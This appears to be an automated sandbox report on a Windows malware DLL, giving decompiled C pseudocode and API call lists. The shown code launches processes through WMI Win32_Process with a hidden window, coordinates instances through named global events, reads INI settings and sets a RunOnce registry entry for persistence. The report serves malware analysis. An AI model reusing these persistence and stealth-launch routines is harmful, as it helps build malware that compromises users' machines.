    					_t158 = "voker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
    					_t154 = __imp__#2;
    					_v116 = 0;
    					_t85 =  *_t154(_t158, _t208, _t153);
    					_t215 = _t85;
    					_t86 = _v100;
    					_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))(_t86, _t215, 0, 0, 0, 0, 0, 0,  &_v120);
    					__imp__#6(_t215);
    					if(_t87 >= 0) {
    						_t91 = _v160;
    						__imp__CoSetProxyBlanket(_t91, 0xa, 0, 0, 3, 3, 0, 0);
    						if(_t91 >= 0) {
    							_v176 = 0;
    							_t94 =  *_t154(L"Win32_Process");
    							_push(0);
    							_push( &_v180);
    							_push(0);
    							_t211 = _t94;
    							_t95 = _v196;
    							_push(0);
    							_push(_t211);
    							_push(_t95);
    							_v168 = _t211;
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x18))))() >= 0) {
    								_v208 = 0;
    								_t98 =  *_t154(L"Win32_ProcessStartup");
    								_t216 = _t98;
    								_t99 = _v224;
    								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x18))))(_t99, _t216, 0, 0,  &_v212, 0);
    								__imp__#6(_t216);
    								if(_t101 >= 0) {
    									_t104 = _v240;
    									_push( &_v248);
    									_v248 = 0;
    									_push(0);
    									_push(_t104);
    									if( *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x3c))))() >= 0) {
    										_t212 = __imp__#8;
    										 *_t212( &_v208);
    										_t110 = _v264;
    										_v212 = 2;
    										_v204 = 1;
    										 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x14))))(_t110, L"ShowWindow", 0,  &_v212, 0);
    										_t113 = _v272;
    										_push(0);
    										_push( &_v280);
    										_push(0);
    										_v280 = 0;
    										_push(L"Create");
    										_push(_t113);
    										if( *((intOrPtr*)( *((intOrPtr*)( *_t113 + 0x4c))))() >= 0) {
    											_t118 = _v300;
    											_push( &_v312);
    											_v312 = 0;
    											_push(0);
    											_push(_t118);
    											if( *((intOrPtr*)( *((intOrPtr*)( *_t118 + 0x3c))))() >= 0) {
    												_t217 = E6ECAA360(_v228, 0, 0);
    												if(_t217 != 0) {
    													_t127 = lstrlenW(_t217) + 2;
    													__imp__#4(_t217, _t127);
    													_t157 = _t127;
    													HeapFree(GetProcessHeap(), 0, _t217);
    													if(_t157 != 0) {
    														 *_t212( &_v288);
    														_v292 = 8;
    														_t132 = _v336;
    														_v284 = _t157;
    														 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x14))))(_t132, L"CommandLine", 0,  &_v292, 0);
    														_t135 = _v256;
    														_t213 = 0;
    														if(_v256 != 0) {
    															_t148 = E6ECAA360(_t135, 0, 0);
    															_t220 = _t148;
    															if(_t220 != 0) {
    																__imp__#2(_t220);
    																_t213 = _t148;
    																if(_t213 != 0) {
    																	_t151 = _v360;
    																	_v316 = 8;
    																	_v308 = _t213;
    																	 *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x14))))(_t151, L"CurrentDirectory", 0,  &_v316, 0);
    																}
    																HeapFree(GetProcessHeap(), 0, _t220);
    															}
    														}
    														__imp__#8( &_v280);
    														_t137 = _v360;
    														_v276 = _v352;
    														_v284 = 9;
    														_t139 =  *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x14))))(_t137, L"ProcessStartupInformation", 0,  &_v284, 0);
    														_v352 = 0;
    														__imp__#2(L"Create");
    														_t218 = _t139;
    														_t140 = _v380;
    														_t142 =  *((intOrPtr*)( *((intOrPtr*)( *_t140 + 0x60))))(_t140, _v352, _t218, 0, 0, _v384,  &_v356, 0);
    														_t219 = __imp__#6;
    														_v376 = _t142;
    														 *_t219(_t218);
    														 *_t219(_t157);
    														if(_t213 != 0) {
    															 *_t219(_t213);
    														}
    														if(_v384 >= 0) {
    															_t145 = _v396;
    															 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 8))))(_t145);
    															_v392 = 1;
    														}
    													}
    												}
    												_t124 = _v324;
    												 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
    											}
    											_t121 = _v312;
    											 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))(_t121);
    										}
    										_t116 = _v304;
    										 *((intOrPtr*)( *((intOrPtr*)( *_t116 + 8))))(_t116);
    										_t211 = _v284;
    									}
    									_t107 = _v252;
    									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))(_t107);
    								}
    								_t102 = _v236;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
    							}
    							__imp__#6(_t211);
    						}
    						_t92 = _v192;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
    					}
    					_t88 = _v140;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
    					return _v132;
    				}
    			}

    APIs
    • CoInitializeEx.OLE32(00000000,00000006), ref: 6ECA29E0
    • CoCreateInstance.OLE32(6ECADF9C,00000000,00000001,6ECADECC,?), ref: 6ECA29FC
    • SysAllocString.OLEAUT32(00000000), ref: 6ECA2A1D
    • SysFreeString.OLEAUT32(00000000), ref: 6ECA2A3C
    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 6ECA2A59
    • SysAllocString.OLEAUT32(Win32_Process), ref: 6ECA2A70
    • SysAllocString.OLEAUT32(Win32_ProcessStartup), ref: 6ECA2A9E
    • SysFreeString.OLEAUT32(00000000), ref: 6ECA2ABA
    • VariantInit.OLEAUT32(?), ref: 6ECA2AF1
      • Part of subcall function 6ECAA360: MultiByteToWideChar.KERNEL32(6ECA39D7,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000000,76D26900,6ECA39D7,?,00000000,00000000), ref: 6ECAA37F
      • Part of subcall function 6ECAA360: GetProcessHeap.KERNEL32(00000008,00000002), ref: 6ECAA392
      • Part of subcall function 6ECAA360: HeapAlloc.KERNEL32(00000000), ref: 6ECAA399
      • Part of subcall function 6ECAA360: MultiByteToWideChar.KERNEL32(6ECA39D7,00000000,00000000,000000FF,00000000,00000000), ref: 6ECAA3A9
    • lstrlenW.KERNEL32(00000000), ref: 6ECA2B79
    • SysAllocStringLen.OLEAUT32(00000000,-00000002), ref: 6ECA2B84
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA2B8E
    • HeapFree.KERNEL32(00000000), ref: 6ECA2B95
    • PathQuoteSpacesW.SHLWAPI(00000000), ref: 6ECA2BAA
    • VariantInit.OLEAUT32(?), ref: 6ECA2BB5
    • SysAllocString.OLEAUT32(00000000), ref: 6ECA2BF9
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA2C2D
    • HeapFree.KERNEL32(00000000), ref: 6ECA2C34
    • VariantInit.OLEAUT32(?), ref: 6ECA2C3F
    • SysAllocString.OLEAUT32(Create), ref: 6ECA2C78
    • SysFreeString.OLEAUT32(00000000), ref: 6ECA2CAA
    • SysFreeString.OLEAUT32(00000000), ref: 6ECA2CAD
    • SysFreeString.OLEAUT32(00000000), ref: 6ECA2CB4
    • SysFreeString.OLEAUT32(00000000), ref: 6ECA2D11
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: String$Free$Alloc$Heap$InitProcessVariant$ByteCharMultiWide$BlanketCreateInitializeInstancePathProxyQuoteSpaceslstrlen
    • String ID: CommandLine$Create$CurrentDirectory$ProcessStartupInformation$ShowWindow$Win32_Process$Win32_ProcessStartup
    • API String ID: 2088563290-1030916257
    • Opcode ID: 23e0cfc4039d2dc57ef611bff1dafa45e657b1ddfd2bec5ee4b151cde6bb4a57
    • Instruction ID: 3e4f4c6cadfc62bb0588b66a9d37de7552563fc1f176ce584280e6a21b44b175
    • Opcode Fuzzy Hash: 23e0cfc4039d2dc57ef611bff1dafa45e657b1ddfd2bec5ee4b151cde6bb4a57
    • Instruction Fuzzy Hash: EEB10571604706AFC704DFA9C884D6BBBEDEFC9748F11490CFA4987210EA35E941CB62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E6ECA78B0() {
    				CHAR* _t23;
    				char* _t24;
    				CHAR* _t26;
    				void* _t29;
    				intOrPtr _t36;
    				CHAR* _t40;
    				void* _t52;
    				void* _t55;
    				int _t56;
    				int _t57;
    				CHAR* _t60;
    				intOrPtr _t62;
    				char* _t68;
    				CHAR* _t71;
    				intOrPtr _t76;
    				intOrPtr _t81;
    				CHAR* _t82;
    				void* _t87;
    				void* _t89;
    				void* _t92;
    				void* _t93;
    				void* _t95;
    				void* _t96;
    				void* _t97;
    				intOrPtr _t112;
    
    				_t60 =  *(_t93 + 0x320);
    				if(_t60 == 0) {
    					L20:
    					_t23 =  *(_t93 + 0x320);
    					_push(_t60);
    					_push(_t23);
    					_push( *((intOrPtr*)(_t93 + 0x31c)));
    					M6ECB0594();
    					return _t23;
    				} else {
    					_t24 = M6ECB0570; // 0x0
    					if(StrCmpNIA(_t60, _t24, 0xa) == 0) {
    						L4:
    						_t26 = M6ECB057C; // 0x0
    						if(lstrcmpiA(_t60, _t26) == 0) {
    							if(M6ECB0514 > 0) {
    								do {
    									Sleep(0x3e8);
    									_t56 = M6ECB0514; // 0x0
    									_t57 = _t56 - 1;
    									M6ECB0514 = _t57;
    								} while (_t57 > 0);
    							}
    							if(M6ECB04B8 != 0) {
    								_t68 = M6ECB0530; // 0xcb2c98
    								wsprintfA(_t93 + 0x11c, "\"%s\"", _t68);
    								_push("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
    								_push(_t93 + 0x128);
    								_t52 = E6ECA29D0();
    								_t93 = _t93 + 0x14;
    								if(_t52 != 0) {
    									_t89 = 0;
    									while(1) {
    										_t81 = M6ECB0544; // 0x1
    										wsprintfA(_t93 + 0x1c, "%s%c%d", _t60, 0x45, _t81);
    										_t93 = _t93 + 0x14;
    										_t55 = OpenEventA(2, 0, _t93 + 0x10);
    										if(_t55 != 0) {
    											break;
    										}
    										Sleep(0x3e8);
    										_t89 = _t89 + 1;
    										if(_t89 < 0xa) {
    											continue;
    										}
    										goto L12;
    									}
    									_push(_t55);
    									L19:
    									CloseHandle();
    									ExitProcess(0);
    								}
    							}
    							L12:
    							_t92 = 0;
    							while(1) {
    								_t112 = M6ECB0544; // 0x1
    								wsprintfA(_t93 + 0x10, "%s%c%d", _t60, 0x45, 0 | _t112 == 0x00000000);
    								_t93 = _t93 + 0x14;
    								_t87 = OpenEventA(2, 0, _t93 + 0x10);
    								if(_t87 == 0) {
    									break;
    								}
    								_push(_t87);
    								if(M6ECB0544 == 0) {
    									goto L19;
    								}
    								SetEvent();
    								CloseHandle(_t87);
    								Sleep(0x3e8);
    								_t92 = _t92 + 1;
    								if(_t92 < 0x3c) {
    									continue;
    								}
    								break;
    							}
    							_push(0xc);
    							_push(0x6ecb046c);
    							L6ECAC2EE();
    							_t76 = M6ECB0544; // 0x1
    							wsprintfA(_t93 + 0x1c, "%s%c%d", _t60, 0x45, _t76);
    							_t95 = _t93 + 0x14;
    							 *0x6ecb046c = CreateEventA( *(_t93 + 0x338), 1, 0, _t95 + 0x10);
    							_t36 = M6ECB057C; // 0x0
    							wsprintfA(_t95 + 0x1c, "%s%s%c", "Global\\", _t36, 0x4b);
    							_t96 = _t95 + 0x14;
    							 *0x6ecb0470 = CreateEventA(0, 1, 0, _t96 + 0x10);
    							E6ECA2170(_t38, 6);
    							_t40 = M6ECB057C; // 0x0
    							wsprintfA(_t96 + 0x24, "%s%s%c", "Global\\", _t40, 0x52);
    							_t97 = _t96 + 0x1c;
    							 *0x6ecb0474 = CreateEventA(0, 1, 0, _t97 + 0x10);
    							E6ECA2170(_t42, 6);
    							M6ECB0510 = CreateThread(0, 0, E6ECA5240, 0, 0, 0);
    							E6ECA2DF0("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", ".bak");
    							_t93 = _t97 + 0x10;
    						}
    						_t62 = M6ECB0544; // 0x1
    						wsprintfA(_t93 + 0x1c, "%s%c%d", _t60, 0x48, _t62);
    						_t29 = _t93 + 0x24;
    						_push(_t29);
    						_push( *((intOrPtr*)(_t93 + 0x33c)));
    						_push( *(_t93 + 0x338));
    						M6ECB0594();
    						return _t29;
    					} else {
    						_t71 = M6ECB0574; // 0x0
    						if(lstrcmpiA(_t60, _t71) == 0) {
    							goto L4;
    						} else {
    							_t82 = M6ECB0578; // 0x0
    							if(lstrcmpiA(_t60, _t82) != 0) {
    								goto L20;
    							} else {
    								goto L4;
    							}
    						}
    					}
    				}
    			}

    APIs
    • StrCmpNIA.SHLWAPI(?,00000000,0000000A), ref: 6ECA78D0
    • lstrcmpiA.KERNEL32(?,00000000), ref: 6ECA78E8
    • lstrcmpiA.KERNEL32(?,00000000), ref: 6ECA78F6
    • lstrcmpiA.KERNEL32(?,00000000), ref: 6ECA7909
    • Sleep.KERNEL32(000003E8), ref: 6ECA7927
    • wsprintfA.USER32 ref: 6ECA7959
    • wsprintfA.USER32 ref: 6ECA798B
    • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6ECA7999
    • Sleep.KERNEL32(000003E8), ref: 6ECA79AC
    • wsprintfA.USER32 ref: 6ECA79D9
    • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6ECA79E7
    • SetEvent.KERNEL32(00000000), ref: 6ECA7A01
    • CloseHandle.KERNEL32(00000000), ref: 6ECA7A08
    • Sleep.KERNEL32(000003E8), ref: 6ECA7A13
    • RtlZeroMemory.NTDLL(6ECB046C,0000000C), ref: 6ECA7A26
    • wsprintfA.USER32 ref: 6ECA7A3F
    • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 6ECA7A5B
    • wsprintfA.USER32 ref: 6ECA7A79
    • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6ECA7A89
    • wsprintfA.USER32 ref: 6ECA7AAF
    • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6ECA7ABF
    • CreateThread.KERNEL32 ref: 6ECA7AE0
    • wsprintfA.USER32 ref: 6ECA7B12
    • CloseHandle.KERNEL32(00000000), ref: 6ECA7B40
    • ExitProcess.KERNEL32 ref: 6ECA7B48
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: wsprintf$Event$Create$Sleeplstrcmpi$CloseHandleOpen$ExitMemoryProcessThreadZero
    • String ID: "%s"$%s%c%d$%s%s%c$.bak$Global\
    • API String ID: 954934373-1282085331
    • Opcode ID: a0b13dcd5b886e3efc2a748f513a12f738d40a9419742b7d3fd2180de2a92f01
    • Instruction ID: 2a217fc38e2b37f741d88ae7abb508b8952b3c956b01316d95d8e9b2edc8ee55
    • Opcode Fuzzy Hash: a0b13dcd5b886e3efc2a748f513a12f738d40a9419742b7d3fd2180de2a92f01
    • Instruction Fuzzy Hash: BD7197B1640705AFE720DBA8CE86FAB7B7CAB85705F004419BB1597185F670A9088F65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E6ECA6A90(CHAR* _a4, intOrPtr _a8) {
    				void _v264;
    				char _v266;
    				char _v267;
    				char _v268;
    				char _v271;
    				char _v272;
    				char _v273;
    				char _v274;
    				short _v275;
    				char _v276;
    				void* _t53;
    				CHAR* _t55;
    				CHAR* _t56;
    				CHAR* _t59;
    				CHAR* _t60;
    				CHAR* _t62;
    				CHAR* _t70;
    				CHAR* _t72;
    				CHAR* _t73;
    				int _t74;
    				CHAR* _t75;
    				CHAR* _t76;
    				CHAR* _t78;
    				CHAR* _t80;
    				char _t81;
    				void* _t83;
    				void* _t85;
    				CHAR* _t86;
    				void* _t88;
    				char _t97;
    				CHAR* _t103;
    				CHAR* _t104;
    				CHAR* _t105;
    				int _t108;
    				CHAR* _t110;
    				CHAR* _t113;
    				CHAR* _t121;
    				CHAR* _t122;
    				CHAR* _t123;
    				CHAR* _t124;
    				CHAR* _t132;
    				int _t133;
    				int _t135;
    				CHAR* _t139;
    
    				_t139 = _a4;
    				if(_t139 != 0) {
    					_t88 = _t139[4];
    					if(_t88 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t88);
    					}
    					_t53 = _t139[8];
    					if(_t53 != 0) {
    						_t53 = HeapFree(GetProcessHeap(), 0, _t53);
    					}
    				}
    				if(_a8 != 0) {
    					return _t53;
    				} else {
    					if(_t139 == 0) {
    						_t86 = M6ECB04CC; // 0xcb2da8
    						_t132 = M6ECB04DC; // 0x0
    						_v268 = 0x67;
    						_v267 = 0x64;
    						_v266 = 0;
    						WritePrivateProfileStringA(_t132,  &_v268, _t139, _t86);
    					}
    					_v275 = 0x64;
    					asm("sbb bl, bl");
    					_t97 = ( ~_t139 & 0x000000f5) + 0x6e;
    					_v273 = 0;
    					_v276 = 0x68;
    					_v274 = _t97;
    					E6ECA1D30(0x6ecb0034);
    					_t55 = M6ECB04CC; // 0xcb2da8
    					_t56 = M6ECB04DC; // 0x0
    					_t133 = GetPrivateProfileStringA(_t56,  &_v276, 0x6ecb0034,  &_v264, 0x104, _t55);
    					E6ECA1D30(0x6ecb0034);
    					if(_t139 == 0) {
    						_t59 = M6ECB04CC; // 0xcb2da8
    						_t60 = M6ECB04DC; // 0x0
    						_v274 = 0x63;
    						WritePrivateProfileStringA(_t60,  &_v276,  &_v264, _t59);
    						_t103 = M6ECB04CC; // 0xcb2da8
    						_t62 = M6ECB04DC; // 0x0
    						_v274 = 0x6e;
    						WritePrivateProfileStringA(_t62,  &_v276, 0, _t103);
    					} else {
    						_t15 = _t133 + 1; // 0x1
    						_t85 = HeapAlloc(GetProcessHeap(), 8, _t15);
    						_t139[4] = _t85;
    						RtlMoveMemory(_t85,  &_v264, _t133);
    						 *_t139 = _t133;
    					}
    					_v275 = 0x70;
    					_v274 = _t97;
    					E6ECA1D30(0x6ecb0010);
    					_t104 = M6ECB04CC; // 0xcb2da8
    					_t105 = M6ECB04DC; // 0x0
    					_t135 = GetPrivateProfileStringA(_t105,  &_v276, 0x6ecb0010,  &_v264, 0x104, _t104);
    					E6ECA1D30(0x6ecb0010);
    					if(_t139 == 0) {
    						_t121 = M6ECB04CC; // 0xcb2da8
    						_t122 = M6ECB04DC; // 0x0
    						_v274 = 0x63;
    						WritePrivateProfileStringA(_t122,  &_v276,  &_v264, _t121);
    						_t70 = M6ECB04CC; // 0xcb2da8
    						_t123 = M6ECB04DC; // 0x0
    						_v274 = 0x6e;
    						WritePrivateProfileStringA(_t123,  &_v276, 0, _t70);
    					} else {
    						_t27 = _t135 + 1; // 0x1
    						_t83 = HeapAlloc(GetProcessHeap(), 8, _t27);
    						_t139[8] = _t83;
    						RtlMoveMemory(_t83,  &_v264, _t135);
    					}
    					_t72 = M6ECB04CC; // 0xcb2da8
    					_t108 =  *0x6ecb000c; // 0x1
    					_t73 = M6ECB04DC; // 0x0
    					_t124 =  &_v276;
    					_v274 = _t97;
    					_v275 = 0x73;
    					_t74 = GetPrivateProfileIntA(_t73, _t124, _t108, _t72);
    					if(_t139 != 0) {
    						_v275 = 0x74;
    						_t139[0xc] = 0 | _t74 != 0x00000000;
    						_t113 = M6ECB04CC; // 0xcb2da8
    						_t80 = M6ECB04DC; // 0x0
    						_t81 = GetPrivateProfileIntA(_t80,  &_v276, 0xc, _t113);
    						_t139[0x10] = _t81;
    						return _t81;
    					}
    					_t75 = M6ECB04CC; // 0xcb2da8
    					_t76 = M6ECB04DC; // 0x0
    					_v272 = (_t124 & 0xffffff00 | _t74 == 0x00000001) + 0x30;
    					_v271 = 0;
    					_v274 = 0x63;
    					WritePrivateProfileStringA(_t76,  &_v276,  &_v272, _t75);
    					_t110 = M6ECB04CC; // 0xcb2da8
    					_t78 = M6ECB04DC; // 0x0
    					_v274 = 0x6e;
    					return WritePrivateProfileStringA(_t78,  &_v276, 0, _t110);
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000), ref: 6ECA6AB3
    • HeapFree.KERNEL32(00000000), ref: 6ECA6ABA
    • GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000), ref: 6ECA6AC6
    • HeapFree.KERNEL32(00000000), ref: 6ECA6ACD
    • WritePrivateProfileStringA.KERNEL32(00000000,?,?,00CB2DA8), ref: 6ECA6B05
    • GetPrivateProfileStringA.KERNEL32(00000000,?,6ECB0034,?,00000104,00CB2DA8), ref: 6ECA6B5D
    • GetProcessHeap.KERNEL32(00000008,00000001), ref: 6ECA6B78
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA6B7F
    • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 6ECA6B8F
    • WritePrivateProfileStringA.KERNEL32 ref: 6ECA6BB9
    • WritePrivateProfileStringA.KERNEL32(00000000,?,00000000,00CB2DA8), ref: 6ECA6BD4
    • GetPrivateProfileStringA.KERNEL32(00000000,?,6ECB0010,?,00000104,00CB2DA8), ref: 6ECA6C0E
    • GetProcessHeap.KERNEL32(00000008,00000001), ref: 6ECA6C2A
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA6C31
    • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 6ECA6C41
    • WritePrivateProfileStringA.KERNEL32 ref: 6ECA6C71
    • WritePrivateProfileStringA.KERNEL32(00000000,?,00000000,00CB2DA8), ref: 6ECA6C8C
    • GetPrivateProfileIntA.KERNEL32 ref: 6ECA6CB5
    • GetPrivateProfileIntA.KERNEL32 ref: 6ECA6CE0
    • WritePrivateProfileStringA.KERNEL32(00000000,?,?,00CB2DA8), ref: 6ECA6D1C
    • WritePrivateProfileStringA.KERNEL32(00000000,?,00000000,00CB2DA8), ref: 6ECA6D37
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfile$String$Heap$Write$Process$AllocFreeMemoryMove
    • String ID: g$h$n$n$p$s$t
    • API String ID: 1023576463-1140765434
    • Opcode ID: 5f1548418b912d39e00dd1629f842d1a319d5e539483d5515085a557083a74ba
    • Instruction ID: 2e0126a6d25d0cdbbb400fd4a4d81e5f69f220a8811a10af6376ff3f2c3c52bb
    • Opcode Fuzzy Hash: 5f1548418b912d39e00dd1629f842d1a319d5e539483d5515085a557083a74ba
    • Instruction Fuzzy Hash: ED816F72518742EFD700CB98DA45E9BB7F9AF99744F048A0CFA8597240E674ED0CCB62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA4CA0(void* __eflags, intOrPtr _a12) {
    				int _v252;
    				char _v256;
    				int _v260;
    				int _v264;
    				void* _v276;
    				void* _v284;
    				char _v288;
    				intOrPtr _t25;
    				void* _t26;
    				long _t31;
    				int _t34;
    				char* _t37;
    				char* _t45;
    				int _t49;
    				int _t56;
    				char* _t59;
    				char* _t60;
    				char* _t71;
    				CHAR* _t73;
    				void* _t74;
    				CHAR* _t76;
    
    				_t25 = M6ECB0588; // 0x0
    				_t26 = E6ECAA2F0(_t25, 0, 0);
    				_t74 = _t26;
    				if(_t74 != 0) {
    					_v288 = 0x4f6e7552;
    					_v284 = 0x65636e;
    					wsprintfA( &_v264, "%s\\%s", _t74,  &_v288);
    					HeapFree(GetProcessHeap(), 0, _t74);
    					_v284 = 0;
    					_t31 = RegCreateKeyExA(0x80000001,  &_v256, 0, 0, 0, 0xf023f, 0,  &_v284, 0);
    					if(_t31 != 0) {
    						L14:
    						return _t31;
    					}
    					if(_a12 == 0) {
    						_v264 = 0;
    						_t73 = HeapAlloc(GetProcessHeap(), 8, 0x105);
    						if(_t73 == 0) {
    							L13:
    							_t31 = RegCloseKey(_v284);
    							goto L14;
    						}
    						_t59 = M6ECB0530; // 0xcb2c98
    						_t34 = wsprintfA(_t73, "\"%s\" f", _t59);
    						_t60 = M6ECB053C; // 0xcb2cac
    						_v252 = _t34;
    						_v264 = 0;
    						_v260 = 1;
    						if(RegQueryValueExA(_v276, _t60, 0,  &_v260, 0,  &_v264) != 0) {
    							L11:
    							_t37 = M6ECB053C; // 0xcb2cac
    							RegSetValueExA(_v276, _t37, 0, 1, _t73, _v252 + 1);
    							L12:
    							HeapFree(GetProcessHeap(), 0, _t73);
    							goto L13;
    						}
    						_t76 = HeapAlloc(GetProcessHeap(), 8, _v264 + 1);
    						if(_t76 == 0) {
    							goto L11;
    						}
    						_t45 = M6ECB053C; // 0xcb2cac
    						if(RegQueryValueExA(_v276, _t45, 0,  &_v260, _t76,  &_v264) != 0) {
    							L9:
    							_t56 = _v256;
    							L10:
    							HeapFree(GetProcessHeap(), 0, _t76);
    							if(_t56 != 0) {
    								goto L12;
    							}
    							goto L11;
    						}
    						_t49 = lstrcmpiA(_t76, _t73);
    						_t56 = 1;
    						if(_t49 == 0) {
    							goto L10;
    						}
    						goto L9;
    					}
    					_t71 = M6ECB053C; // 0xcb2cac
    					RegDeleteValueA(_v284, _t71);
    					goto L13;
    				}
    				return _t26;
    			}

    APIs
      • Part of subcall function 6ECAA2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C), ref: 6ECAA311
